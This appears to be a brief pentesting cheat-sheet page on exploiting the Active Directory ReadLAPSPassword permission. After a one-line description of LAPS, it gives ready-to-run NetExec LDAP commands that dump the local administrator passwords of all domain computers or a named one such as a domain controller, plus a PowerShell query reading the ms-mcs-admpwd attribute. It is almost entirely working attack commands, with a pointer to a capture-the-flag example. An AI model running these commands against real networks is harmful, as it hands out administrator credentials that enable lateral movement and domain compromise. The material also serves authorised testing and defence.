ReadLAPSPassword
Information
LAPS is a Windows feature that automatically manages and backs up the password of a local administrator account on Windows Server AD-joined devices

Exploitation
Linux
# read the password of all computers
nxc ldap <ip> -u <user> -p <pass> -M laps
# read the password of a specific computer
nxc ldap <ip> -u <user> -p <pass> -M laps -o COMPUTER='DC01$'
For an example of reading the LAPS password with NXC check Timelapse.
Windows
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
Resources
Last updated
Was this helpful?